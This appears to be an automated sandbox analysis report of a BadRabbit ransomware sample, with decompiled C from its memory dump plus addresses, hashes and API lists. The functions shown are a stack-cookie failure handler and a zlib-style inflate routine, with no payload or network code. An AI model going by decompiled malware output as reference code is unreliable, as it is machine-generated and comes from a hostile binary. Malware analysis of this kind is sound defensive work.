                                                                                                          0x00882a3e
                                                                                                          0x008829cf
                                                                                                          0x008829d2
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829d4
                                                                                                          0x008829d7
                                                                                                          0x00882a07
                                                                                                          0x00882a07
                                                                                                          0x00882a0a
                                                                                                          0x00882a39
                                                                                                          0x00882a3c
                                                                                                          0x00000000
                                                                                                          0x00882a3c
                                                                                                          0x00882a0c
                                                                                                          0x00881899
                                                                                                          0x00881899
                                                                                                          0x00881dc2
                                                                                                          0x00881dc2
                                                                                                          0x00000000
                                                                                                          0x00881dc2
                                                                                                          0x008829d9
                                                                                                          0x008829dc
                                                                                                          0x008829dc
                                                                                                          0x008829de
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x008829e0
                                                                                                          0x008829e4
                                                                                                          0x008829e7
                                                                                                          0x008829e9
                                                                                                          0x008829eb
                                                                                                          0x008829ee
                                                                                                          0x008829f1
                                                                                                          0x008829f3
                                                                                                          0x008829f6
                                                                                                          0x008829f7
                                                                                                          0x008829fa
                                                                                                          0x008829fd
                                                                                                          0x00882a00
                                                                                                          0x00882a03
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00882a05
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a44
                                                                                                          0x00882a44
                                                                                                          0x00882a46
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a49
                                                                                                          0x00882a4b
                                                                                                          0x00882a4c
                                                                                                          0x00882a4c
                                                                                                          0x00882a4f
                                                                                                          0x00882a4f
                                                                                                          0x00882a52
                                                                                                          0x00882a52
                                                                                                          0x00882a52
                                                                                                          0x00882a5b
                                                                                                          0x00882a5e
                                                                                                          0x00882a61
                                                                                                          0x00882a64
                                                                                                          0x00882a66
                                                                                                          0x00882a6b
                                                                                                          0x00882a6e
                                                                                                          0x00882a71
                                                                                                          0x00882a74
                                                                                                          0x00882a77
                                                                                                          0x00882a7a
                                                                                                          0x00882a91
                                                                                                          0x00882a9b
                                                                                                          0x00882aa3
                                                                                                          0x00882aa5
                                                                                                          0x00882ab4
                                                                                                          0x00882ab4
                                                                                                          0x00882ab6
                                                                                                          0x00882ab9
                                                                                                          0x00882abc
                                                                                                          0x00882abf
                                                                                                          0x00882ac2
                                                                                                          0x00882ac5
                                                                                                          0x00882ac8
                                                                                                          0x00882acb
                                                                                                          0x00882ace
                                                                                                          0x00882ad0
                                                                                                          0x00882ad2
                                                                                                          0x00882ad7
                                                                                                          0x00882ada
                                                                                                          0x00882adb
                                                                                                          0x00882ade
                                                                                                          0x00882ae1
                                                                                                          0x00882aea
                                                                                                          0x00882ae3
                                                                                                          0x00882ae3
                                                                                                          0x00882ae3
                                                                                                          0x00882aef
                                                                                                          0x00882af2
                                                                                                          0x00882af2
                                                                                                          0x00882af4
                                                                                                          0x00882af4
                                                                                                          0x00882ad2
                                                                                                          0x00882af7
                                                                                                          0x00882afa
                                                                                                          0x00882b01
                                                                                                          0x00882b01
                                                                                                          0x00000000
                                                                                                          0x00882afc
                                                                                                          0x00882afc
                                                                                                          0x00882aff
                                                                                                          0x00882b06
                                                                                                          0x00882b0b
                                                                                                          0x00882b12
                                                                                                          0x00882b19
                                                                                                          0x00882b1c
                                                                                                          0x00882b22
                                                                                                          0x00882b24
                                                                                                          0x00882b27
                                                                                                          0x00882b2d
                                                                                                          0x00882b2f
                                                                                                          0x00882b35
                                                                                                          0x00882b35
                                                                                                          0x00882b39
                                                                                                          0x00000000
                                                                                                          0x00882b4b
                                                                                                          0x00882b3b
                                                                                                          0x00882b3b
                                                                                                          0x00882b3e
                                                                                                          0x00882b40
                                                                                                          0x00882b42
                                                                                                          0x00882b43
                                                                                                          0x00000000
                                                                                                          0x00882b43
                                                                                                          0x00882b31
                                                                                                          0x00882b33
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882b33
                                                                                                          0x00000000
                                                                                                          0x00882aff
                                                                                                          0x00882afa
                                                                                                          0x00882aa7
                                                                                                          0x00000000
                                                                                                          0x00882aa7
                                                                                                          0x00882a7c
                                                                                                          0x00882a7f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a81
                                                                                                          0x00882a84
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a86
                                                                                                          0x00882a89
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882a8b
                                                                                                          0x00882a8f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00882aad
                                                                                                          0x00882aad
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00881dc5
                                                                                                          0x00881dc5
                                                                                                          0x00881dc7
                                                                                                          0x008817be
                                                                                                          0x008817b5

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8 Oqt$8 Oqt$8 Oqt$header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
                                                                                                          • API String ID: 0-1116616283
                                                                                                          • Opcode ID: 04a5bbd2062b486968633e60a29d90eafec08374d5aa211d3fe76276620ebdbc
                                                                                                          • Instruction ID: 0d508f1eceebe2d2d4caa57dd538a629d94bf4df6cf7ead026f02d7dbe393237
                                                                                                          • Opcode Fuzzy Hash: 04a5bbd2062b486968633e60a29d90eafec08374d5aa211d3fe76276620ebdbc
                                                                                                          • Instruction Fuzzy Hash: 3A425EB0A00619DFDF28DF59C4846AEBBF6FF88300F1485A9D855DB256DB70DA42CB90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 624 881499-88149f 625 8814a1 624->625 626 8814a4-88158a UnhandledExcep GetCurrentProcess TerminateProcess 624->626
                                                                                                          C-Code - Quality: 59%
                                                                                                          			E00881499(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                          				intOrPtr _v0;
                                                                                                          				void* _v804;
                                                                                                          				intOrPtr _v808;
                                                                                                          				intOrPtr _v812;
                                                                                                          				intOrPtr* _t25;
                                                                                                          
                                                                                                          				if(__ecx !=  *0x888000) {
                                                                                                          					 *0x888120 = __eax;
                                                                                                          					 *0x88811c = __ecx;
                                                                                                          					 *0x888118 = __edx;
                                                                                                          					 *0x888114 = __ebx;
                                                                                                          					 *0x888110 = __esi;
                                                                                                          					 *0x88810c = __edi;
                                                                                                          					 *0x888138 = ss;
                                                                                                          					 *0x88812c = cs;
                                                                                                          					 *0x888108 = ds;
                                                                                                          					 *0x888104 = es;
                                                                                                          					 *0x888100 = fs;
                                                                                                          					 *0x8880fc = gs;
                                                                                                          					asm("pushfd");
                                                                                                          					_pop( *0x888130);
                                                                                                          					 *0x888124 =  *_t25;
                                                                                                          					 *0x888128 = _v0;
                                                                                                          					 *0x888134 =  &_a4;
                                                                                                          					 *0x888070 = 0x10001;
                                                                                                          					 *0x88802c =  *0x888128;
                                                                                                          					 *0x888020 = 0xc0000409;
                                                                                                          					 *0x888024 = 1;
                                                                                                          					_v812 =  *0x888000;
                                                                                                          					_v808 =  *0x888004;
                                                                                                          					SetUnhandledExceptionFilter(0);
                                                                                                          					__imp__UnhandledExcep(0x884080);
                                                                                                          					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                          				} else {
                                                                                                          					return __eax;
                                                                                                          				}
                                                                                                          			}








                                                                                                          0x0088149f
                                                                                                          0x008814b4
                                                                                                          0x008814b9
                                                                                                          0x008814bf
                                                                                                          0x008814c5
                                                                                                          0x008814cb
                                                                                                          0x008814d1
                                                                                                          0x008814d7
                                                                                                          0x008814de
                                                                                                          0x008814e5
                                                                                                          0x008814ec
                                                                                                          0x008814f3
                                                                                                          0x008814fa
                                                                                                          0x00881501
                                                                                                          0x00881502
                                                                                                          0x0088150b
                                                                                                          0x00881513
                                                                                                          0x0088151b
                                                                                                          0x00881526
                                                                                                          0x00881535
                                                                                                          0x0088153a
                                                                                                          0x00881544
                                                                                                          0x00881553
                                                                                                          0x0088155e
                                                                                                          0x00881566
                                                                                                          0x00881571
                                                                                                          0x0088158a
                                                                                                          0x008814a1
                                                                                                          0x008814a1
                                                                                                          0x008814a1

                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00881566
                                                                                                          • UnhandledExcep.KERNEL32(00884080), ref: 00881571
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0088157C
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 00881583
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000001.00000002.328686156.0000000000881000.00000020.00000001.01000000.00000006.sdmp, Offset: 00880000, based on PE: true
                                                                                                          • Associated: 00000001.00000002.328679067.0000000000880000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328695785.0000000000884000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 00000001.00000002.328877255.0000000000889000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_1_2_880000_Endermanch@BadRabbit.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                                                                                          • String ID: Pdqt
                                                                                                          • API String ID: 1999905405-3302706896
                                                                                                          • Opcode ID: f2ed8b8463307a7076756ee81acb79d26c051fd109ee9483599b851cef7e7a72
                                                                                                          • Instruction ID: bb3cd7bfa64b00f7b3d61592c1eb486c34a2d4f3d2a8ef4020174f79908093b6
                                                                                                          • Opcode Fuzzy Hash: f2ed8b8463307a7076756ee81acb79d26c051fd109ee9483599b851cef7e7a72
                                                                                                          • Instruction Fuzzy Hash: 6221DBBD801605CBC391DF6DFD886443BF8FB18314B90A01AE608C7320EFB499868F59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 629 883840-8838d6 630 8838d8-8838f8 629->630 631 8838fa-883900 629->631 632 883912 630->632 631->632 633 883902-883910 631->633 634 883916-88391d 632->634 633->631 635 883bac-883bc9 634->635 636 883923 634->636 637 883bcc-883bd2 635->637 638 883990-883993 636->638 639 883925-883939 636->639 640 883bd4-883be3 637->640 641 883be6-883bef 637->641 642 8839a2-8839ab 638->642 643 883995-8839a0 638->643 644 88393b-883945 639->644 645 88397f 639->645 640->641 647 883bf2-883bfc 641->647 649 8839ae-8839b6 642->649 643->642 644->645 646 883947-88394d 644->646 648 883989-88398d 645->648 646->645 650 88394f-883955 646->650 651 883bfe-883c01 647->651 652 883c17-883c1e 647->652 648->634 653 8839b8-8839bb 649->653 654 8839d1-8839da 649->654 650->645 657 883957-883967 650->657 658 883c02-883c06 651->658 659 883d04-883d06 652->659 660 883c24-883c27 652->660 661 8839bc-8839c0 653->661 655 8839e0-8839e3 654->655 656 883ad4-883ad6 654->656 662 883a0a-883a11 655->662 663 8839e5-8839e7 655->663 664 883dea-883dec 656->664 665 883adc-883aef 656->665 657->645 666 883969-88396f 657->666 668 883e28-883e2f 658->668 669 883c0c-883c10 658->669 659->664 667 883d0c-883d21 659->667 670 883c29-883c3b 660->670 671 883c3d-883c43 660->671 661->668 672 8839c6-8839ca 661->672 679 883a20-883a2a 662->679 680 883a13-883a1e 662->680 673 8839e9-8839f8 663->673 674 8839fa-883a08 663->674 681 883dfa-883e04 664->681 682 883dee-883df8 664->682 665->649 677 883971 666->677 678 883973-88397d 666->678 667->647 675 883e31 668->675 676 883e33-883e56 668->676 669->637 683 883c12 669->683 670->671 684 883c45-883c54 671->684 685 883c57-883c64 671->685 672->638 686 8839cc 672->686 673->674 674->662 675->676 690 883e58-883e68 676->690 691 883e6c-883e7d 676->691 677->645 678->648 687 883a2d-883a3c 679->687 680->679 688 883e16-883e1c 681->688 682->688 683->668 684->685 689 883c67-883c76 685->689 686->668 696 883a42-883a45 687->696 697 883af4-883af6 687->697 698 883e1e 688->698 699 883e21-883e26 688->699 692 883d28-883d2a 689->692 693 883c7c-883c7f 689->693 690->691 694 883e7f-883e85 691->694 695 883e87-883e92 691->695 705 883dde-883de8 692->705 708 883d30-883d49 692->708 702 883cd8-883cdb 693->702 703 883c81-883c93 693->703 694->695 706 883e9e-883ea5 695->706 707 883e94-883e9c 695->707 700 883aac-883aaf 696->700 701 883a47-883a49 696->701 704 883afc-883b0f 697->704 697->705 698->699 699->668 709 883a6e-883a7a 700->709 710 883ab1-883ab5 700->710 714 883a4b-883a5a 701->714 715 883a5c-883a6c 701->715 711 883c95-883ca1 702->711 712 883cdd-883ce1 702->712 703->711 704->687 705->688 713 883ea8-883eae 706->713 707->713 708->689 716 883d50-883d5e 708->716 717 883a80-883aa7 709->717 718 883b14-883b22 709->718 710->709 721 883ab7-883acf 710->721 711->716 722 883ca7-883cd0 711->722 712->711 723 883ce3-883cfd 712->723 724 883ebd-883ec7 713->724 725 883eb0-883ebb 713->725 714->715 715->709 719 883d64-883d6b 716->719 720 883e06-883e14 716->720 717->661 718->720 726 883b28-883b2f 718->726 728 883d8d-883d93 719->728 729 883d6d-883d73 719->729 720->688 721->661 722->658 723->658 727 883eca-883ed2 724->727 725->727 734 883b31-883b3b 726->734 735 883b55-883b5b 726->735 730 883dbd-883dc3 728->730 731 883d95-883da1 728->731 732 883dcd-883dd9 729->732 733 883d75-883d7d 729->733 730->732 737 883dc5-883dcb 730->737 731->732 736 883da3-883db1 731->736 732->658 733->732 738 883b9d-883ba5 734->738 739 883b3d-883b45 734->739 740 883b89-883b93 735->740 741 883b5d-883b6d 735->741 736->732 742 883db3-883dbb 736->742 737->732 738->661 739->738 740->738 744 883b95-883b9b 740->744 741->738 743 883b6f-883b7d 741->743 742->732 743->738 745 883b7f-883b87 743->745 744->738 745->738
                                                                                                          C-Code - Quality: 81%
                                                                                                          			E00883840() {
                                                                                                          				signed int _t162;
                                                                                                          				unsigned int _t170;
                                                                                                          				unsigned int _t171;
                                                                                                          				signed int _t172;
                                                                                                          				signed int _t174;
                                                                                                          				signed int _t176;
                                                                                                          				signed int _t177;
                                                                                                          				signed int _t180;
                                                                                                          				signed int _t182;
                                                                                                          				unsigned int _t183;
                                                                                                          				int _t184;
                                                                                                          				int _t192;
                                                                                                          				signed char _t198;
                                                                                                          				signed int _t205;
                                                                                                          				signed int _t206;
                                                                                                          				signed int _t207;
                                                                                                          				int _t208;
                                                                                                          				int _t220;
                                                                                                          				signed int _t225;
                                                                                                          				signed int _t233;
                                                                                                          				signed int _t248;
                                                                                                          				signed char _t249;
                                                                                                          				unsigned int _t250;
                                                                                                          				signed char _t251;
                                                                                                          				signed int* _t252;
                                                                                                          				signed int _t255;
                                                                                                          				signed int _t256;
                                                                                                          				signed int _t257;
                                                                                                          				signed int _t262;
                                                                                                          				intOrPtr _t267;
                                                                                                          				signed char _t274;
                                                                                                          				signed int _t275;
                                                                                                          				char* _t276;
                                                                                                          				signed int _t278;
                                                                                                          				signed char _t280;
                                                                                                          				signed int _t283;
                                                                                                          				signed int _t287;
                                                                                                          				int _t288;
                                                                                                          				int _t289;
                                                                                                          				int _t292;
                                                                                                          				int _t294;
                                                                                                          				int _t298;
                                                                                                          				signed int _t301;
                                                                                                          				signed char _t307;
                                                                                                          				signed char _t308;
                                                                                                          				signed char _t311;
                                                                                                          				signed char _t312;
                                                                                                          				signed int _t314;
                                                                                                          				int _t315;
                                                                                                          				int _t316;
                                                                                                          				signed char _t318;
                                                                                                          				int _t320;
                                                                                                          				int _t322;
                                                                                                          				int _t326;
                                                                                                          				signed int _t329;
                                                                                                          				signed char _t332;
                                                                                                          				signed char _t333;
                                                                                                          				signed char _t335;
                                                                                                          				int _t337;
                                                                                                          				signed int _t343;
                                                                                                          				int _t345;
                                                                                                          				intOrPtr _t346;
                                                                                                          				intOrPtr _t347;
                                                                                                          				unsigned int _t352;
                                                                                                          				unsigned int _t357;
                                                                                                          				signed int _t360;
                                                                                                          				signed int _t361;
                                                                                                          				intOrPtr _t362;
                                                                                                          				void* _t363;
                                                                                                          				intOrPtr* _t374;
                                                                                                          				void* _t375;
                                                                                                          				intOrPtr* _t383;
                                                                                                          				void* _t384;
                                                                                                          				signed int _t389;
                                                                                                          				void* _t390;
                                                                                                          				signed int _t391;
                                                                                                          				void* _t396;
                                                                                                          				void* _t398;
                                                                                                          				intOrPtr* _t405;
                                                                                                          				void* _t406;
                                                                                                          				signed int _t407;
                                                                                                          				void* _t409;
                                                                                                          				intOrPtr* _t416;
                                                                                                          				void* _t417;
                                                                                                          				unsigned int _t422;
                                                                                                          				signed int _t423;
                                                                                                          				void* _t425;
                                                                                                          				signed int* _t426;
                                                                                                          				void* _t430;
                                                                                                          
                                                                                                          				asm("pushfd");
                                                                                                          				_t426 = _t425 - 0x40;
                                                                                                          				asm("cld");
                                                                                                          				_t389 = _t426[0x16];
                                                                                                          				_t362 =  *((intOrPtr*)(_t389 + 0x1c));
                                                                                                          				_t162 =  *_t389;
                                                                                                          				_t426[0xb] = _t162;
                                                                                                          				_t426[5] =  *((intOrPtr*)(_t389 + 4)) + _t162 - 0xb;
                                                                                                          				_t267 =  *((intOrPtr*)(_t389 + 0x10));
                                                                                                          				_t248 =  *(_t389 + 0xc);
                                                                                                          				_t426[0xf] = _t248;
                                                                                                          				_t426[0xa] =  ~(_t426[0x17] - _t267) + _t248;
                                                                                                          				_t426[4] = _t267 - 0x101 + _t248;
                                                                                                          				_t426[2] =  *(_t362 + 0x4c);
                                                                                                          				_t426[3] =  *(_t362 + 0x50);
                                                                                                          				 *_t426 = (1 <<  *(_t362 + 0x54)) - 1;
                                                                                                          				_t426[1] = (1 <<  *(_t362 + 0x58)) - 1;
                                                                                                          				_t170 =  *(_t362 + 0x28);
                                                                                                          				_t343 =  *(_t362 + 0x34);
                                                                                                          				_t426[0xd] = _t170;
                                                                                                          				_t426[0xc] =  *(_t362 + 0x30);
                                                                                                          				_t426[0xe] = _t343;
                                                                                                          				_t422 =  *(_t362 + 0x38);
                                                                                                          				_t249 =  *(_t362 + 0x3c);
                                                                                                          				_t390 = _t426[0xb];
                                                                                                          				_t274 = _t426[5];
                                                                                                          				if(_t274 > _t390) {
                                                                                                          					L2:
                                                                                                          					if((_t390 & 0x00000003) != 0) {
                                                                                                          						_t390 = _t390 + 1;
                                                                                                          						_t274 = _t249;
                                                                                                          						_t249 = _t249 + 8;
                                                                                                          						_t170 = 0 << _t274;
                                                                                                          						_t422 = _t422 | _t170;
                                                                                                          						goto L2;
                                                                                                          					}
                                                                                                          					goto L4;
                                                                                                          				} else {
                                                                                                          					_t337 = _t274 + 0xb - _t390;
                                                                                                          					_t170 = memset(_t390 + _t337 + _t337, 0, memcpy( &(_t426[7]), _t390, _t337) << 0);
                                                                                                          					_t426 =  &(_t426[6]);
                                                                                                          					_t274 = 0;
                                                                                                          					_t390 =  &(_t426[7]);
                                                                                                          					_t426[5] = _t390;
                                                                                                          					L4:
                                                                                                          					_t363 = _t426[0xf];
                                                                                                          					while(1) {
                                                                                                          						_t430 =  *0x888010 - 2;
                                                                                                          						if(_t430 == 0) {
                                                                                                          							break;
                                                                                                          						}
                                                                                                          						if(_t430 > 0) {
                                                                                                          							do {
                                                                                                          								if(_t249 <= 0xf) {
                                                                                                          									asm("lodsw");
                                                                                                          									_t318 = _t249;
                                                                                                          									_t249 = _t249 + 0x10;
                                                                                                          									_t422 = _t423 | 0 << _t318;
                                                                                                          								}
                                                                                                          								_t171 =  *(_t426[2] + ( *_t426 & _t422) * 4);
                                                                                                          								while(1) {
                                                                                                          									_t250 = _t249 - _t171;
                                                                                                          									_t423 = _t422 >> _t171;
                                                                                                          									if(_t171 == 0) {
                                                                                                          										asm("stosb");
                                                                                                          										goto L22;
                                                                                                          									}
                                                                                                          									_t352 = _t171 >> 0x10;
                                                                                                          									_t307 = _t171;
                                                                                                          									if((_t171 & 0x00000010) == 0) {
                                                                                                          										if((_t171 & 0x00000040) != 0) {
                                                                                                          											L97:
                                                                                                          											if((_t171 & 0x00000020) == 0) {
                                                                                                          												_t276 = "invalid literal/length code";
                                                                                                          												_t346 = 0x1a;
                                                                                                          											} else {
                                                                                                          												_t276 = 0;
                                                                                                          												_t346 = 0xb;
                                                                                                          											}
                                                                                                          											L101:
                                                                                                          											_t172 = _t426[0x16];
                                                                                                          											if(_t276 != 0) {
                                                                                                          												 *(_t172 + 0x18) = _t276;
                                                                                                          											}
                                                                                                          											 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x1c)))) = _t346;
                                                                                                          											goto L104;
                                                                                                          										}
                                                                                                          										_t171 =  *(_t426[2] + (((0x00000001 << _t307) - 0x00000001 & _t423) + _t352) * 4);
                                                                                                          										continue;
                                                                                                          									}
                                                                                                          									_t308 = _t307 & 0x0000000f;
                                                                                                          									if(_t308 != 0) {
                                                                                                          										if(_t250 < _t308) {
                                                                                                          											asm("lodsw");
                                                                                                          											_t335 = _t250;
                                                                                                          											_t250 = _t250 + 0x10;
                                                                                                          											_t423 = _t423 | 0 << _t335;
                                                                                                          											_t308 = _t335;
                                                                                                          										}
                                                                                                          										_t250 = _t250 - _t308;
                                                                                                          										_t233 = (0x00000001 << _t308) - 0x00000001 & _t423;
                                                                                                          										_t423 = _t423 >> _t308;
                                                                                                          										_t352 = _t352 + _t233;
                                                                                                          									}
                                                                                                          									_t426[6] = _t352;
                                                                                                          									if(_t250 <= 0xf) {
                                                                                                          										asm("lodsw");
                                                                                                          										_t333 = _t250;
                                                                                                          										_t250 = _t250 + 0x10;
                                                                                                          										_t423 = _t423 | 0 << _t333;
                                                                                                          									}
                                                                                                          									_t198 =  *(_t426[3] + (_t426[1] & _t423) * 4);
                                                                                                          									while(1) {
                                                                                                          										_t357 = _t198 >> 0x10;
                                                                                                          										_t250 = _t250 - _t198;
                                                                                                          										_t423 = _t423 >> _t198;
                                                                                                          										_t311 = _t198;
                                                                                                          										if((_t198 & 0x00000010) != 0) {
                                                                                                          											break;
                                                                                                          										}
                                                                                                          										if((_t198 & 0x00000040) != 0) {
                                                                                                          											L96:
                                                                                                          											_t276 = "invalid distance code";
                                                                                                          											_t346 = 0x1a;
                                                                                                          											goto L101;
                                                                                                          										}
                                                                                                          										_t198 =  *(_t426[3] + (((0x00000001 << _t311) - 0x00000001 & _t423) + _t357) * 4);
                                                                                                          									}
                                                                                                          									_t312 = _t311 & 0x0000000f;
                                                                                                          									if(_t312 == 0) {
                                                                                                          										if(_t357 != 1 || _t426[0xa] == _t363) {
                                                                                                          											L38:
                                                                                                          											_t426[0xb] = _t390;
                                                                                                          											_t205 = _t363 - _t426[0xa];
                                                                                                          											if(_t205 < _t357) {
                                                                                                          												_t206 = _t426[0xd];
                                                                                                          												_t314 =  ~_t205;
                                                                                                          												_t407 = _t426[0xe];
                                                                                                          												if(_t206 < _t357) {
                                                                                                          													L100:
                                                                                                          													_t390 = _t426[0xb];
                                                                                                          													_t276 = "invalid distance too far back";
                                                                                                          													_t346 = 0x1a;
                                                                                                          													goto L101;
                                                                                                          												}
                                                                                                          												_t315 = _t314 + _t357;
                                                                                                          												if(_t426[0xc] != 0) {
                                                                                                          													_t207 = _t426[0xc];
                                                                                                          													if(_t315 <= _t207) {
                                                                                                          														_t409 = _t407 + _t207 - _t315;
                                                                                                          														_t208 = _t426[6];
                                                                                                          														if(_t208 > _t315) {
                                                                                                          															_t208 = memcpy(_t363, _t409, _t315);
                                                                                                          															_t426 =  &(_t426[3]);
                                                                                                          															_t363 = _t409 + _t315 + _t315;
                                                                                                          															_t409 = _t363 - _t357;
                                                                                                          														}
                                                                                                          													} else {
                                                                                                          														_t409 = _t407 + _t426[0xd] + _t207 - _t315;
                                                                                                          														_t320 = _t315 - _t207;
                                                                                                          														_t208 = _t426[6];
                                                                                                          														if(_t208 > _t320) {
                                                                                                          															_t208 = memcpy(_t363, _t409, _t320);
                                                                                                          															_t426 =  &(_t426[3]);
                                                                                                          															_t363 = _t409 + _t320 + _t320;
                                                                                                          															_t409 = _t426[0xe];
                                                                                                          															_t322 = _t426[0xc];
                                                                                                          															if(_t208 > _t322) {
                                                                                                          																_t208 = memcpy(_t363, _t409, _t322);
                                                                                                          																_t426 =  &(_t426[3]);
                                                                                                          																_t363 = _t409 + _t322 + _t322;
                                                                                                          																_t409 = _t363 - _t357;
                                                                                                          															}
                                                                                                          														}
                                                                                                          													}
                                                                                                          												} else {
                                                                                                          													_t409 = _t407 + _t206 - _t315;
                                                                                                          													_t208 = _t426[6];
                                                                                                          													if(_t208 > _t315) {
                                                                                                          														_t208 = memcpy(_t363, _t409, _t315);
                                                                                                          														_t426 =  &(_t426[3]);
                                                                                                          														_t363 = _t409 + _t315 + _t315;
                                                                                                          														_t409 = _t363 - _t357;
                                                                                                          													}
                                                                                                          												}
                                                                                                          												_t316 = _t208;
                                                                                                          												memcpy(_t363, _t409, _t316);
                                                                                                          												_t426 =  &(_t426[3]);
                                                                                                          												_t363 = _t409 + _t316 + _t316;
                                                                                                          												_t390 = _t426[0xb];
                                                                                                          												goto L22;
                                                                                                          											}
                                                                                                          											_t416 = _t363 - _t357;
                                                                                                          											_t326 = _t426[6] - 3;
                                                                                                          											 *_t363 =  *_t416;
                                                                                                          											_t417 = _t416 + 3;
                                                                                                          											 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t416 + 1));
                                                                                                          											 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t416 + 2));
                                                                                                          											memcpy(_t363 + 3, _t417, _t326);
                                                                                                          											_t426 =  &(_t426[3]);
                                                                                                          											_t363 = _t417 + _t326 + _t326;
                                                                                                          											_t390 = _t426[0xb];
                                                                                                          										} else {
                                                                                                          											_t383 = _t363 - 1;
                                                                                                          											_t220 =  *_t383;
                                                                                                          											_t329 = _t426[6] - 3;
                                                                                                          											 *(_t383 + 1) = _t220;
                                                                                                          											 *(_t383 + 2) = _t220;
                                                                                                          											 *(_t383 + 3) = _t220;
                                                                                                          											_t384 = _t383 + 4;
                                                                                                          											memset(_t384, _t220, _t329 << 0);
                                                                                                          											_t426 =  &(_t426[3]);
                                                                                                          											_t363 = _t384 + _t329;
                                                                                                          										}
                                                                                                          										goto L22;
                                                                                                          									}
                                                                                                          									if(_t250 < _t312) {
                                                                                                          										asm("lodsw");
                                                                                                          										_t332 = _t250;
                                                                                                          										_t250 = _t250 + 0x10;
                                                                                                          										_t423 = _t423 | 0 << _t332;
                                                                                                          										_t312 = _t332;
                                                                                                          									}
                                                                                                          									_t250 = _t250 - _t312;
                                                                                                          									_t225 = (0x00000001 << _t312) - 0x00000001 & _t423;
                                                                                                          									_t423 = _t423 >> _t312;
                                                                                                          									_t357 = _t357 + _t225;
                                                                                                          									goto L38;
                                                                                                          								}
                                                                                                          								L22:
                                                                                                          							} while (_t426[4] > _t363 && _t426[5] > _t390);
                                                                                                          							L104:
                                                                                                          							if( *0x888010 == 2) {
                                                                                                          								_t250 = _t423;
                                                                                                          							}
                                                                                                          							_t174 = _t426[0x16];
                                                                                                          							_t347 =  *((intOrPtr*)(_t174 + 0x1c));
                                                                                                          							_t278 = _t250 >> 3;
                                                                                                          							_t391 = _t390 - _t278;
                                                                                                          							_t251 = _t250 - (_t278 << 3);
                                                                                                          							 *(_t174 + 0xc) = _t363;
                                                                                                          							 *(_t347 + 0x3c) = _t251;
                                                                                                          							_t280 = _t251;
                                                                                                          							_t252 =  &(_t426[7]);
                                                                                                          							if(_t426[5] == _t252) {
                                                                                                          								_t262 =  *_t174;
                                                                                                          								_t426[5] = _t262;
                                                                                                          								_t391 = _t391 - _t252 + _t262;
                                                                                                          								_t426[5] = _t426[5] +  *((intOrPtr*)(_t174 + 4)) - 0xb;
                                                                                                          							}
                                                                                                          							 *_t174 = _t391;
                                                                                                          							_t255 = (1 << _t280) - 1;
                                                                                                          							if( *0x888010 == 2) {
                                                                                                          								asm("psrlq mm0, mm1");
                                                                                                          								asm("movd ebp, mm0");
                                                                                                          								asm("emms");
                                                                                                          							}
                                                                                                          							 *(_t347 + 0x38) = _t423 & _t255;
                                                                                                          							_t256 = _t426[5];
                                                                                                          							if(_t256 <= _t391) {
                                                                                                          								 *((intOrPtr*)(_t174 + 4)) =  ~(_t391 - _t256) + 0xb;
                                                                                                          							} else {
                                                                                                          								 *((intOrPtr*)(_t174 + 4)) = _t256 - _t391 + 0xb;
                                                                                                          							}
                                                                                                          							_t257 = _t426[4];
                                                                                                          							if(_t257 <= _t363) {
                                                                                                          								 *((intOrPtr*)(_t174 + 0x10)) =  ~(_t363 - _t257) + 0x101;
                                                                                                          							} else {
                                                                                                          								 *((intOrPtr*)(_t174 + 0x10)) = _t257 - _t363 + 0x101;
                                                                                                          							}
                                                                                                          							asm("popfd");
                                                                                                          							return _t174;
